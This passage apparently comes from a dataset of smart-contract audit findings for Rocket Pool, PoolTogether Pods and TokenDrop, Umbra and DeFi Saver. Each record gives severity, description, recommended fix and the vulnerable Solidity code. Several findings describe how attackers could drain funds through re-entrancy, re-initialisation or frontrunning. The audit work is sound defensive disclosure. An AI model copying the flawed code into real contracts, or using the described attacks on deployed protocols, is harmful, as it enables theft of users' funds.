rplSlashAmount);\\n```\\nчDefine a clear interface for these functions. Remove the static return value in favor of having the method throw on failure (which is already the current behavior).чч```\\n// Emit token transfer\\nemit TokenDeposited(contractKey, \\_tokenAddress, \\_amount, block.timestamp);\\n// Done\\nreturn true;\\n```\\n -RocketMinipoolDelegate - enforce that the delegate contract cannot be called directlyчlowчThis contract is not meant to be consumed directly and will only be delegate called from `Minipool`. Being able to call it directly might even create the problem that, in the worst case, someone might be able to `selfdestruct` the contract rendering all other contracts that link to it dysfunctional. This might even not be easily detectable because `delegatecall` to an EOA will act as a NOP.\\nThe access control checks on the methods currently prevent methods from being called directly on the delegate. They require state variables to be set correctly, or the delegate is registered as a valid minipool in the system. Both conditions are improbable to be fulfilled, hence, mitigation any security risk. However, it looks like this is more of a side-effect than a design decision, and we would recommend not explicitly stating that the delegate contract cannot be used directly.\\n```\\nconstructor(address \\_rocketStorageAddress) {\\n // Initialise RocketStorage\\n require(\\_rocketStorageAddress != address(0x0), \"Invalid storage address\");\\n rocketStorage = RocketStorageInterface(\\_rocketStorageAddress);\\n}\\n```\\nчResolution\\nAddressed in branch `rp3.0-updates` (rocket-pool/[email protected]b424ca1) by removing the constructor and therefore the initialization code from the RocketMinipoolDelegate contract. The contract cannot be used directly anymore as all relevant methods are decorated `onlyInitialised` and there is no way to initialize it in the implementation directly.\\nRemove the initialization from the constructor in the delegate contract. 
Consider adding a flag that indicates that the delegate contract is initialized and only set in the Minipool contract and not in the logic contract (delegate). On calls, check that the contract is initialized.чч```\\nconstructor(address \\_rocketStorageAddress) {\\n // Initialise RocketStorage\\n require(\\_rocketStorageAddress != address(0x0), \"Invalid storage address\");\\n rocketStorage = RocketStorageInterface(\\_rocketStorageAddress);\\n}\\n```\\n -Re-entrancy issue for ERC1155чhighчERC1155 tokens have callback functions on some of the transfers, like `safeTransferFrom`, `safeBatchTransferFrom`. During these transfers, the `IERC1155ReceiverUpgradeable(to).onERC1155Received` function is called in the `to` address.\\nFor example, `safeTransferFrom` is used in the `LiquidityMining` contract:\\n```\\nfunction distributeAllNFT() external {\\n require(block.timestamp > getEndLMTime(),\\n \"2 weeks after liquidity mining time has not expired\");\\n require(!isNFTDistributed, \"NFT is already distributed\");\\n\\n for (uint256 i = 0; i < leaderboard.length; i++) {\\n address[] memory \\_groupLeaders = groupsLeaders[leaderboard[i]];\\n\\n for (uint256 j = 0; j < \\_groupLeaders.length; j++) {\\n \\_sendNFT(j, \\_groupLeaders[j]);\\n }\\n }\\n\\n for (uint256 i = 0; i < topUsers.length; i++) {\\n address \\_currentAddress = topUsers[i];\\n LMNFT.safeTransferFrom(address(this), \\_currentAddress, 1, 1, \"\");\\n emit NFTSent(\\_currentAddress, 1);\\n }\\n\\n isNFTDistributed = true;\\n}\\n```\\n\\nDuring that transfer, the `distributeAllNFT` function can be called again and again. So multiple transfers will be done for each user.\\nIn addition to that, any receiver of the tokens can revert the transfer. 
If that happens, nobody will be able to receive their tokens.чAdd a reentrancy guard.\\nAvoid transferring tokens for different receivers in a single transaction.чч```\\nfunction distributeAllNFT() external {\\n require(block.timestamp > getEndLMTime(),\\n \"2 weeks after liquidity mining time has not expired\");\\n require(!isNFTDistributed, \"NFT is already distributed\");\\n\\n for (uint256 i = 0; i < leaderboard.length; i++) {\\n address[] memory \\_groupLeaders = groupsLeaders[leaderboard[i]];\\n\\n for (uint256 j = 0; j < \\_groupLeaders.length; j++) {\\n \\_sendNFT(j, \\_groupLeaders[j]);\\n }\\n }\\n\\n for (uint256 i = 0; i < topUsers.length; i++) {\\n address \\_currentAddress = topUsers[i];\\n LMNFT.safeTransferFrom(address(this), \\_currentAddress, 1, 1, \"\");\\n emit NFTSent(\\_currentAddress, 1);\\n }\\n\\n isNFTDistributed = true;\\n}\\n```\\n -Winning pods can be frontrun with large depositsчhighч`Pod.depositTo()` grants users shares of the pod pool in exchange for `tokenAmount` of `token`.\\n```\\nfunction depositTo(address to, uint256 tokenAmount)\\n external\\n override\\n returns (uint256)\\n{\\n require(tokenAmount > 0, \"Pod:invalid-amount\");\\n\\n // Allocate Shares from Deposit To Amount\\n uint256 shares = \\_deposit(to, tokenAmount);\\n\\n // Transfer Token Transfer Message Sender\\n IERC20Upgradeable(token).transferFrom(\\n msg.sender,\\n address(this),\\n tokenAmount\\n );\\n\\n // Emit Deposited\\n emit Deposited(to, tokenAmount, shares);\\n\\n // Return Shares Minted\\n return shares;\\n}\\n```\\n\\nThe winner of a prize pool is typically determined by an off-chain random number generator, which requires a request to first be made on-chain. The result of this RNG request can be seen in the mempool and frontrun. 
In this case, an attacker could identify a winning `Pod` contract and make a large deposit, diluting existing user shares and claiming the entire prize.чThe modifier `pauseDepositsDuringAwarding` is included in the `Pod` contract but is unused.\\n```\\nmodifier pauseDepositsDuringAwarding() {\\n require(\\n !IPrizeStrategyMinimal(\\_prizePool.prizeStrategy()).isRngRequested(),\\n \"Cannot deposit while prize is being awarded\"\\n );\\n \\_;\\n}\\n```\\n\\nAdd this modifier to the `depositTo()` function along with corresponding test cases.чч```\\nfunction depositTo(address to, uint256 tokenAmount)\\n external\\n override\\n returns (uint256)\\n{\\n require(tokenAmount > 0, \"Pod:invalid-amount\");\\n\\n // Allocate Shares from Deposit To Amount\\n uint256 shares = \\_deposit(to, tokenAmount);\\n\\n // Transfer Token Transfer Message Sender\\n IERC20Upgradeable(token).transferFrom(\\n msg.sender,\\n address(this),\\n tokenAmount\\n );\\n\\n // Emit Deposited\\n emit Deposited(to, tokenAmount, shares);\\n\\n // Return Shares Minted\\n return shares;\\n}\\n```\\n -TokenDrop: Unprotected initialize() functionчhighчThe `TokenDrop.initialize()` function is unprotected and can be called multiple times.\\n```\\nfunction initialize(address \\_measure, address \\_asset) external {\\n measure = IERC20Upgradeable(\\_measure);\\n asset = IERC20Upgradeable(\\_asset);\\n\\n // Set Factory Deployer\\n factory = msg.sender;\\n}\\n```\\n\\nAmong other attacks, this would allow an attacker to re-initialize any `TokenDrop` with the same `asset` and a malicious `measure` token. 
By manipulating the balance of a user in this malicious `measure` token, the entire `asset` token balance of the `TokenDrop` contract could be drained.чAdd the `initializer` modifier to the `initialize()` function and include an explicit test that every initialization function in the system can be called once and only once.чч```\\nfunction initialize(address \\_measure, address \\_asset) external {\\n measure = IERC20Upgradeable(\\_measure);\\n asset = IERC20Upgradeable(\\_asset);\\n\\n // Set Factory Deployer\\n factory = msg.sender;\\n}\\n```\\n -Pod: Re-entrancy during deposit or withdrawal can lead to stealing fundsчhighчDuring the deposit, the token transfer is made after the Pod shares are minted:\\n```\\nuint256 shares = \\_deposit(to, tokenAmount);\\n\\n// Transfer Token Transfer Message Sender\\nIERC20Upgradeable(token).transferFrom(\\n msg.sender,\\n address(this),\\n tokenAmount\\n);\\n```\\n\\nThat means that if the `token` allows re-entrancy, the attacker can deposit one more time inside the `token` transfer. If that happens, the second call will mint more tokens than it is supposed to, because the first `token` transfer will still not be finished. 
By doing so with big amounts, it's possible to drain the pod.чAdd re-entrancy guard to the external functions.чч```\\nuint256 shares = \\_deposit(to, tokenAmount);\\n\\n// Transfer Token Transfer Message Sender\\nIERC20Upgradeable(token).transferFrom(\\n msg.sender,\\n address(this),\\n tokenAmount\\n);\\n```\\n -TokenDrop: Re-entrancy in the claim function can cause to draining fundsчhighчIf the `asset` token is making a call before the `transfer` to the `receiver` or to any other 3-d party contract (like it's happening in the `Pod` token using the `_beforeTokenTransfer` function), the attacker can call the `drop` function inside the `transfer` call here:\\n```\\nfunction claim(address user) external returns (uint256) {\\n drop();\\n \\_captureNewTokensForUser(user);\\n uint256 balance = userStates[user].balance;\\n userStates[user].balance = 0;\\n totalUnclaimed = uint256(totalUnclaimed).sub(balance).toUint112();\\n\\n // Transfer asset/reward token to user\\n asset.transfer(user, balance);\\n\\n // Emit Claimed\\n emit Claimed(user, balance);\\n\\n return balance;\\n}\\n```\\n\\nBecause the `totalUnclaimed` is already changed, but the current balance is not, the `drop` function will consider the funds from the unfinished transfer as the new tokens. These tokens will be virtually redistributed to everyone.\\nAfter that, the transfer will still happen, and further calls of the `drop()` function will fail because the following line will revert:\\n`uint256 newTokens = assetTotalSupply.sub(totalUnclaimed);`\\nThat also means that any transfers of the `Pod` token will fail because they all are calling the `drop` function. 
The `TokenDrop` will “unfreeze” only if someone transfers enough tokens to the `TokenDrop` contract.\\nThe severity of this issue is hard to evaluate because, at the moment, there's not a lot of tokens that allow this kind of re-entrancy.чSimply adding re-entrancy guard to the `drop` and the `claim` function won't help because the `drop` function is called from the `claim`. For that, the transfer can be moved to a separate function, and this function can have the re-entrancy guard as well as the `drop` function.\\nAlso, it's better to make sure that `_beforeTokenTransfer` will not revert to prevent the token from being frozen.чч```\\nfunction claim(address user) external returns (uint256) {\\n drop();\\n \\_captureNewTokensForUser(user);\\n uint256 balance = userStates[user].balance;\\n userStates[user].balance = 0;\\n totalUnclaimed = uint256(totalUnclaimed).sub(balance).toUint112();\\n\\n // Transfer asset/reward token to user\\n asset.transfer(user, balance);\\n\\n // Emit Claimed\\n emit Claimed(user, balance);\\n\\n return balance;\\n}\\n```\\n -Pod: Having multiple token drops is inconsistentчmediumчThe `Pod` contract had the `drop` storage field and mapping of different TokenDrops `(token => TokenDrop)`. When adding a new `TokenDrop` in the mapping, the `drop` field is also changed to the added _tokenDrop:\\n```\\nfunction setTokenDrop(address \\_token, address \\_tokenDrop)\\n external\\n returns (bool)\\n{\\n require(\\n msg.sender == factory || msg.sender == owner(),\\n \"Pod:unauthorized-set-token-drop\"\\n );\\n\\n // Check if target<>tokenDrop mapping exists\\n require(\\n drops[\\_token] == TokenDrop(0),\\n \"Pod:target-tokendrop-mapping-exists\"\\n );\\n\\n // Set TokenDrop Referance\\n drop = TokenDrop(\\_tokenDrop);\\n\\n // Set target<>tokenDrop mapping\\n drops[\\_token] = drop;\\n\\n return true;\\n}\\n```\\n\\nOn the other hand, the `measure` token and the `asset` token of the `drop` are strictly defined by the Pod contract. 
They cannot be changed, so all `TokenDrops` are supposed to have the same `asset` and `measure` tokens. So it is useless to have different `TokenDrops`.чThe mapping seems to be unused, and only one `TokenDrop` will normally be in the system. If that code is not used, it should be deleted.чч```\\nfunction setTokenDrop(address \\_token, address \\_tokenDrop)\\n external\\n returns (bool)\\n{\\n require(\\n msg.sender == factory || msg.sender == owner(),\\n \"Pod:unauthorized-set-token-drop\"\\n );\\n\\n // Check if target<>tokenDrop mapping exists\\n require(\\n drops[\\_token] == TokenDrop(0),\\n \"Pod:target-tokendrop-mapping-exists\"\\n );\\n\\n // Set TokenDrop Referance\\n drop = TokenDrop(\\_tokenDrop);\\n\\n // Set target<>tokenDrop mapping\\n drops[\\_token] = drop;\\n\\n return true;\\n}\\n```\\n -Pod: Fees are not limited by a user during the withdrawalчmediumчWhen withdrawing from the Pod, the shares are burned, and the deposit is removed from the Pod. If there are not enough deposit tokens in the contract, the remaining tokens are withdrawn from the pool contract:\\n```\\nif (amount > currentBalance) {\\n // Calculate Withdrawl Amount\\n uint256 \\_withdraw = amount.sub(currentBalance);\\n\\n // Withdraw from Prize Pool\\n uint256 exitFee = \\_withdrawFromPool(\\_withdraw);\\n\\n // Add Exit Fee to Withdrawl Amount\\n amount = amount.sub(exitFee);\\n}\\n```\\n\\nThese tokens are withdrawn with a fee from the pool, which is not controlled or limited by the user.чAllow users to pass a `maxFee` parameter to control fees.чч```\\nif (amount > currentBalance) {\\n // Calculate Withdrawl Amount\\n uint256 \\_withdraw = amount.sub(currentBalance);\\n\\n // Withdraw from Prize Pool\\n uint256 exitFee = \\_withdrawFromPool(\\_withdraw);\\n\\n // Add Exit Fee to Withdrawl Amount\\n amount = amount.sub(exitFee);\\n}\\n```\\n -Pod.setManager() checks validity of wrong addressчlowчThe function `Pod.setManager()` allows the `owner` of the Pod contract to change the 
Pod's `manager`. It checks that the value of the existing `manager` in storage is nonzero. This is presumably intended to ensure that the `owner` has provided a valid `newManager` parameter in calldata.\\nThe current check will always pass once the contract is initialized with a nonzero `manager`. But, the contract can currently be initialized with a `manager` of `IPodManager(address(0))`. In this case, the check would prevent the `manager` from ever being updated.\\n```\\nfunction setManager(IPodManager newManager)\\n public\\n virtual\\n onlyOwner\\n returns (bool)\\n{\\n // Require Valid Address\\n require(address(manager) != address(0), \"Pod:invalid-manager-address\");\\n```\\nчChange the check to:\\n```\\nrequire(address(newManager) != address(0), \"Pod:invalid-manager-address\");\\n```\\n\\nMore generally, attempt to define validity criteria for all input values that are as strict as possible. Consider preventing zero inputs or inputs that might conflict with other addresses in the smart contract system altogether, including in contract initialization functions.чч```\\nfunction setManager(IPodManager newManager)\\n public\\n virtual\\n onlyOwner\\n returns (bool)\\n{\\n // Require Valid Address\\n require(address(manager) != address(0), \"Pod:invalid-manager-address\");\\n```\\n -Reuse of CHAINID from contract deploymentчlowчThe internal function `_validateWithdrawSignature()` is used to check whether a sponsored token withdrawal is approved by the owner of the stealth address that received the tokens. 
Among other data, the chain ID is signed over to prevent replay of signatures on other EVM-compatible chains.\\n```\\nfunction \\_validateWithdrawSignature(\\n address \\_stealthAddr,\\n address \\_acceptor,\\n address \\_tokenAddr,\\n address \\_sponsor,\\n uint256 \\_sponsorFee,\\n IUmbraHookReceiver \\_hook,\\n bytes memory \\_data,\\n uint8 \\_v,\\n bytes32 \\_r,\\n bytes32 \\_s\\n) internal view {\\n bytes32 \\_digest =\\n keccak256(\\n abi.encodePacked(\\n \"\\x19Ethereum Signed Message:\\n32\",\\n keccak256(abi.encode(chainId, version, \\_acceptor, \\_tokenAddr, \\_sponsor, \\_sponsorFee, address(\\_hook), \\_data))\\n )\\n );\\n\\n address \\_recoveredAddress = ecrecover(\\_digest, \\_v, \\_r, \\_s);\\n require(\\_recoveredAddress != address(0) && \\_recoveredAddress == \\_stealthAddr, \"Umbra: Invalid Signature\");\\n}\\n```\\n\\nHowever, this chain ID is set as an immutable value in the contract constructor. In the case of a future contentious hard fork of the Ethereum network, the same `Umbra` contract would exist on both of the resulting chains. One of these two chains would be expected to change the network's chain ID, but the `Umbra` contracts would not be aware of this change. As a result, signatures to the `Umbra` contract on either chain would be replayable on the other chain.\\nThis is a common pattern in contracts that implement EIP-712 signatures. Presumably, the motivation in most cases for committing to the chain ID at deployment time is to avoid recomputing the EIP-712 domain separator for every signature verification. In this case, the chain ID is a direct input to the generation of the signed digest, so this should not be a concern.чReplace the use of the `chainId` immutable value with the `CHAINID` opcode in `_validateWithdrawSignature()`. 
Note that `CHAINID` is only available using Solidity's inline assembly, so this would need to be accessed in the same way as it is currently accessed in the contract's constructor:\\n```\\nuint256 \\_chainId;\\n\\nassembly {\\n \\_chainId := chainid()\\n}\\n```\\nчч```\\nfunction \\_validateWithdrawSignature(\\n address \\_stealthAddr,\\n address \\_acceptor,\\n address \\_tokenAddr,\\n address \\_sponsor,\\n uint256 \\_sponsorFee,\\n IUmbraHookReceiver \\_hook,\\n bytes memory \\_data,\\n uint8 \\_v,\\n bytes32 \\_r,\\n bytes32 \\_s\\n) internal view {\\n bytes32 \\_digest =\\n keccak256(\\n abi.encodePacked(\\n \"\\x19Ethereum Signed Message:\\n32\",\\n keccak256(abi.encode(chainId, version, \\_acceptor, \\_tokenAddr, \\_sponsor, \\_sponsorFee, address(\\_hook), \\_data))\\n )\\n );\\n\\n address \\_recoveredAddress = ecrecover(\\_digest, \\_v, \\_r, \\_s);\\n require(\\_recoveredAddress != address(0) && \\_recoveredAddress == \\_stealthAddr, \"Umbra: Invalid Signature\");\\n}\\n```\\n -Random task executionчhighчIn a scenario where user takes a flash loan, `_parseFLAndExecute()` gives the flash loan wrapper contract (FLAaveV2, FLDyDx) the permission to execute functions on behalf of the user's `DSProxy`. This execution permission is revoked only after the entire recipe execution is finished, which means that in case that any of the external calls along the recipe execution is malicious, it might call `executeAction()` back and inject any task it wishes (e.g. 
take user's funds out, drain approved tokens, etc)\\n```\\nfunction executeOperation(\\n address[] memory \\_assets,\\n uint256[] memory \\_amounts,\\n uint256[] memory \\_fees,\\n address \\_initiator,\\n bytes memory \\_params\\n) public returns (bool) {\\n require(msg.sender == AAVE\\_LENDING\\_POOL, ERR\\_ONLY\\_AAVE\\_CALLER);\\n require(\\_initiator == address(this), ERR\\_SAME\\_CALLER);\\n\\n (Task memory currTask, address proxy) = abi.decode(\\_params, (Task, address));\\n\\n // Send FL amounts to user proxy\\n for (uint256 i = 0; i < \\_assets.length; ++i) {\\n \\_assets[i].withdrawTokens(proxy, \\_amounts[i]);\\n }\\n\\n address payable taskExecutor = payable(registry.getAddr(TASK\\_EXECUTOR\\_ID));\\n\\n // call Action execution\\n IDSProxy(proxy).execute{value: address(this).balance}(\\n taskExecutor,\\n abi.encodeWithSelector(CALLBACK\\_SELECTOR, currTask, bytes32(\\_amounts[0] + \\_fees[0]))\\n );\\n\\n // return FL\\n for (uint256 i = 0; i < \\_assets.length; i++) {\\n \\_assets[i].approveToken(address(AAVE\\_LENDING\\_POOL), \\_amounts[i] + \\_fees[i]);\\n }\\n\\n return true;\\n}\\n```\\nчA reentrancy guard (mutex) that covers the entire content of FLAaveV2.executeOperation/FLDyDx.callFunction should be used to prevent such attack.чч```\\nfunction executeOperation(\\n address[] memory \\_assets,\\n uint256[] memory \\_amounts,\\n uint256[] memory \\_fees,\\n address \\_initiator,\\n bytes memory \\_params\\n) public returns (bool) {\\n require(msg.sender == AAVE\\_LENDING\\_POOL, ERR\\_ONLY\\_AAVE\\_CALLER);\\n require(\\_initiator == address(this), ERR\\_SAME\\_CALLER);\\n\\n (Task memory currTask, address proxy) = abi.decode(\\_params, (Task, address));\\n\\n // Send FL amounts to user proxy\\n for (uint256 i = 0; i < \\_assets.length; ++i) {\\n \\_assets[i].withdrawTokens(proxy, \\_amounts[i]);\\n }\\n\\n address payable taskExecutor = payable(registry.getAddr(TASK\\_EXECUTOR\\_ID));\\n\\n // call Action execution\\n 
IDSProxy(proxy).execute{value: address(this).balance}(\\n taskExecutor,\\n abi.encodeWithSelector(CALLBACK\\_SELECTOR, currTask, bytes32(\\_amounts[0] + \\_fees[0]))\\n );\\n\\n // return FL\\n for (uint256 i = 0; i < \\_assets.length; i++) {\\n \\_assets[i].approveToken(address(AAVE\\_LENDING\\_POOL), \\_amounts[i] + \\_fees[i]);\\n }\\n\\n return true;\\n}\\n```\\n -Tokens with more than 18 decimal points will cause issuesчhighчIt is assumed that the maximum number of decimals for each token is 18. However uncommon, but it is possible to have tokens with more than 18 decimals, as an Example YAMv2 has 24 decimals. This can result in broken code flow and unpredictable outcomes (e.g. an underflow will result with really high rates).\\n```\\n function getSellRate(address \\_srcAddr, address \\_destAddr, uint \\_srcAmount, bytes memory) public override view returns (uint rate) {\\n (rate, ) = KyberNetworkProxyInterface(KYBER\\_INTERFACE)\\n .getExpectedRate(IERC20(\\_srcAddr), IERC20(\\_destAddr), \\_srcAmount);\\n\\n // multiply with decimal difference in src token\\n rate = rate \\* (10\\*\\*(18 - getDecimals(\\_srcAddr)));\\n // divide with decimal difference in dest token\\n rate = rate / (10\\*\\*(18 - getDecimals(\\_destAddr)));\\n }\\n```\\nчMake sure the code won't fail in case the token's decimals is more than 18.чч```\\n function getSellRate(address \\_srcAddr, address \\_destAddr, uint \\_srcAmount, bytes memory) public override view returns (uint rate) {\\n (rate, ) = KyberNetworkProxyInterface(KYBER\\_INTERFACE)\\n .getExpectedRate(IERC20(\\_srcAddr), IERC20(\\_destAddr), \\_srcAmount);\\n\\n // multiply with decimal difference in src token\\n rate = rate \\* (10\\*\\*(18 - getDecimals(\\_srcAddr)));\\n // divide with decimal difference in dest token\\n rate = rate / (10\\*\\*(18 - getDecimals(\\_destAddr)));\\n }\\n```\\n -Error codes of Compound's Comptroller.enterMarket, Comptroller.exitMarket are not checkedчhighчCompound's `enterMarket/exitMarket` 
functions return an error code instead of reverting in case of failure. DeFi Saver smart contracts never check for the error codes returned from Compound smart contracts, although the code flow might revert due to unavailability of the CTokens, however early on checks for Compound errors are suggested.\\n```\\nfunction enterMarket(address \\_cTokenAddr) public {\\n address[] memory markets = new address[](1);\\n markets[0] = \\_cTokenAddr;\\n\\n IComptroller(COMPTROLLER\\_ADDR).enterMarkets(markets);\\n}\\n\\n/// @notice Exits the Compound market\\n/// @param \\_cTokenAddr CToken address of the token\\nfunction exitMarket(address \\_cTokenAddr) public {\\n IComptroller(COMPTROLLER\\_ADDR).exitMarket(\\_cTokenAddr);\\n}\\n```\\nчCaller contract should revert in case the error code is not 0.чч```\\nfunction enterMarket(address \\_cTokenAddr) public {\\n address[] memory markets = new address[](1);\\n markets[0] = \\_cTokenAddr;\\n\\n IComptroller(COMPTROLLER\\_ADDR).enterMarkets(markets);\\n}\\n\\n/// @notice Exits the Compound market\\n/// @param \\_cTokenAddr CToken address of the token\\nfunction exitMarket(address \\_cTokenAddr) public {\\n IComptroller(COMPTROLLER\\_ADDR).exitMarket(\\_cTokenAddr);\\n}\\n```\\n -Reversed order of parameters in allowance function callчmediumчWhen trying to pull the maximum amount of tokens from an approver to the allowed spender, the parameters that are used for the `allowance` function call are not in the same order that is used later in the call to `safeTransferFrom`.\\n```\\nfunction pullTokens(\\n address \\_token,\\n address \\_from,\\n uint256 \\_amount\\n) internal returns (uint256) {\\n // handle max uint amount\\n if (\\_amount == type(uint256).max) {\\n uint256 allowance = IERC20(\\_token).allowance(address(this), \\_from);\\n uint256 balance = getBalance(\\_token, \\_from);\\n\\n \\_amount = (balance > allowance) ? 
allowance : balance;\\n }\\n\\n if (\\_from != address(0) && \\_from != address(this) && \\_token != ETH\\_ADDR && \\_amount != 0) {\\n IERC20(\\_token).safeTransferFrom(\\_from, address(this), \\_amount);\\n }\\n\\n return \\_amount;\\n}\\n```\\nчReverse the order of parameters in `allowance` function call to fit the order that is in the `safeTransferFrom` function call.чч```\\nfunction pullTokens(\\n address \\_token,\\n address \\_from,\\n uint256 \\_amount\\n) internal returns (uint256) {\\n // handle max uint amount\\n if (\\_amount == type(uint256).max) {\\n uint256 allowance = IERC20(\\_token).allowance(address(this), \\_from);\\n uint256 balance = getBalance(\\_token, \\_from);\\n\\n \\_amount = (balance > allowance) ? allowance : balance;\\n }\\n\\n if (\\_from != address(0) && \\_from != address(this) && \\_token != ETH\\_ADDR && \\_amount != 0) {\\n IERC20(\\_token).safeTransferFrom(\\_from, address(this), \\_amount);\\n }\\n\\n return \\_amount;\\n}\\n```\\n -Kyber getRates code is unclearчlowч`getSellRate` can be converted into one function to get the rates, which then for buy or sell can swap input and output tokens\\n`getBuyRate` uses a 3% slippage that is not documented.\\n```\\n function getSellRate(address \\_srcAddr, address \\_destAddr, uint \\_srcAmount, bytes memory) public override view returns (uint rate) {\\n (rate, ) = KyberNetworkProxyInterface(KYBER\\_INTERFACE)\\n .getExpectedRate(IERC20(\\_srcAddr), IERC20(\\_destAddr), \\_srcAmount);\\n\\n // multiply with decimal difference in src token\\n rate = rate \\* (10\\*\\*(18 - getDecimals(\\_srcAddr)));\\n // divide with decimal difference in dest token\\n rate = rate / (10\\*\\*(18 - getDecimals(\\_destAddr)));\\n }\\n\\n /// @notice Return a rate for which we can buy an amount of tokens\\n /// @param \\_srcAddr From token\\n /// @param \\_destAddr To token\\n /// @param \\_destAmount To amount\\n /// @return rate Rate\\n function getBuyRate(address \\_srcAddr, address \\_destAddr, uint 
\\_destAmount, bytes memory \\_additionalData) public override view returns (uint rate) {\\n uint256 srcRate = getSellRate(\\_destAddr, \\_srcAddr, \\_destAmount, \\_additionalData);\\n uint256 srcAmount = wmul(srcRate, \\_destAmount);\\n\\n rate = getSellRate(\\_srcAddr, \\_destAddr, srcAmount, \\_additionalData);\\n\\n // increase rate by 3% too account for inaccuracy between sell/buy conversion\\n rate = rate + (rate / 30);\\n }\\n```\\nчRefactoring the code to separate getting rate functionality with `getSellRate` and `getBuyRate`. Explicitly document any assumptions in the code ( slippage, etc)чч```\\n function getSellRate(address \\_srcAddr, address \\_destAddr, uint \\_srcAmount, bytes memory) public override view returns (uint rate) {\\n (rate, ) = KyberNetworkProxyInterface(KYBER\\_INTERFACE)\\n .getExpectedRate(IERC20(\\_srcAddr), IERC20(\\_destAddr), \\_srcAmount);\\n\\n // multiply with decimal difference in src token\\n rate = rate \\* (10\\*\\*(18 - getDecimals(\\_srcAddr)));\\n // divide with decimal difference in dest token\\n rate = rate / (10\\*\\*(18 - getDecimals(\\_destAddr)));\\n }\\n\\n /// @notice Return a rate for which we can buy an amount of tokens\\n /// @param \\_srcAddr From token\\n /// @param \\_destAddr To token\\n /// @param \\_destAmount To amount\\n /// @return rate Rate\\n function getBuyRate(address \\_srcAddr, address \\_destAddr, uint \\_destAmount, bytes memory \\_additionalData) public override view returns (uint rate) {\\n uint256 srcRate = getSellRate(\\_destAddr, \\_srcAddr, \\_destAmount, \\_additionalData);\\n uint256 srcAmount = wmul(srcRate, \\_destAmount);\\n\\n rate = getSellRate(\\_srcAddr, \\_destAddr, srcAmount, \\_additionalData);\\n\\n // increase rate by 3% too account for inaccuracy between sell/buy conversion\\n rate = rate + (rate / 30);\\n }\\n```\\n -Return values not used for DFSExchangeCore.onChainSwapчlowчReturn values from `DFSExchangeCore.onChainSwap` are not used.\\n```\\nfunction 
\\_sell(ExchangeData memory exData) internal returns (address, uint256) {\\n uint256 amountWithoutFee = exData.srcAmount;\\n address wrapper = exData.offchainData.wrapper;\\n bool offChainSwapSuccess;\\n\\n uint256 destBalanceBefore = exData.destAddr.getBalance(address(this));\\n\\n // Takes DFS exchange fee\\n exData.srcAmount -= getFee(\\n exData.srcAmount,\\n exData.user,\\n exData.srcAddr,\\n exData.dfsFeeDivider\\n );\\n\\n // Try 0x first and then fallback on specific wrapper\\n if (exData.offchainData.price > 0) {\\n (offChainSwapSuccess, ) = offChainSwap(exData, ExchangeActionType.SELL);\\n }\\n\\n // fallback to desired wrapper if 0x failed\\n if (!offChainSwapSuccess) {\\n onChainSwap(exData, ExchangeActionType.SELL);\\n wrapper = exData.wrapper;\\n }\\n\\n uint256 destBalanceAfter = exData.destAddr.getBalance(address(this));\\n uint256 amountBought = sub(destBalanceAfter, destBalanceBefore);\\n\\n // check slippage\\n require(amountBought >= wmul(exData.minPrice, exData.srcAmount), ERR\\_SLIPPAGE\\_HIT);\\n\\n // revert back exData changes to keep it consistent\\n exData.srcAmount = amountWithoutFee;\\n\\n return (wrapper, amountBought);\\n}\\n```\\n\\n```\\nfunction \\_buy(ExchangeData memory exData) internal returns (address, uint256) {\\n require(exData.destAmount != 0, ERR\\_DEST\\_AMOUNT\\_MISSING);\\n\\n uint256 amountWithoutFee = exData.srcAmount;\\n address wrapper = exData.offchainData.wrapper;\\n bool offChainSwapSuccess;\\n\\n uint256 destBalanceBefore = exData.destAddr.getBalance(address(this));\\n\\n // Takes DFS exchange fee\\n exData.srcAmount -= getFee(\\n exData.srcAmount,\\n exData.user,\\n exData.srcAddr,\\n exData.dfsFeeDivider\\n );\\n\\n // Try 0x first and then fallback on specific wrapper\\n if (exData.offchainData.price > 0) {\\n (offChainSwapSuccess, ) = offChainSwap(exData, ExchangeActionType.BUY);\\n }\\n\\n // fallback to desired wrapper if 0x failed\\n if (!offChainSwapSuccess) {\\n onChainSwap(exData, 
ExchangeActionType.BUY);\\n wrapper = exData.wrapper;\\n }\\n\\n uint256 destBalanceAfter = exData.destAddr.getBalance(address(this));\\n uint256 amountBought = sub(destBalanceAfter, destBalanceBefore);\\n\\n // check slippage\\n require(amountBought >= exData.destAmount, ERR\\_SLIPPAGE\\_HIT);\\n\\n // revert back exData changes to keep it consistent\\n exData.srcAmount = amountWithoutFee;\\n\\n return (wrapper, amountBought);\\n}\\n```\\nчThe return value can be used for verification of the swap or used in the event data.чч```\\nfunction \\_sell(ExchangeData memory exData) internal returns (address, uint256) {\\n uint256 amountWithoutFee = exData.srcAmount;\\n address wrapper = exData.offchainData.wrapper;\\n bool offChainSwapSuccess;\\n\\n uint256 destBalanceBefore = exData.destAddr.getBalance(address(this));\\n\\n // Takes DFS exchange fee\\n exData.srcAmount -= getFee(\\n exData.srcAmount,\\n exData.user,\\n exData.srcAddr,\\n exData.dfsFeeDivider\\n );\\n\\n // Try 0x first and then fallback on specific wrapper\\n if (exData.offchainData.price > 0) {\\n (offChainSwapSuccess, ) = offChainSwap(exData, ExchangeActionType.SELL);\\n }\\n\\n // fallback to desired wrapper if 0x failed\\n if (!offChainSwapSuccess) {\\n onChainSwap(exData, ExchangeActionType.SELL);\\n wrapper = exData.wrapper;\\n }\\n\\n uint256 destBalanceAfter = exData.destAddr.getBalance(address(this));\\n uint256 amountBought = sub(destBalanceAfter, destBalanceBefore);\\n\\n // check slippage\\n require(amountBought >= wmul(exData.minPrice, exData.srcAmount), ERR\\_SLIPPAGE\\_HIT);\\n\\n // revert back exData changes to keep it consistent\\n exData.srcAmount = amountWithoutFee;\\n\\n return (wrapper, amountBought);\\n}\\n```\\n -Return value is not used for TokenUtils.withdrawTokensчlowчThe return value of `TokenUtils.withdrawTokens` which represents the actual amount of tokens that were transferred is never used throughout the repository. 
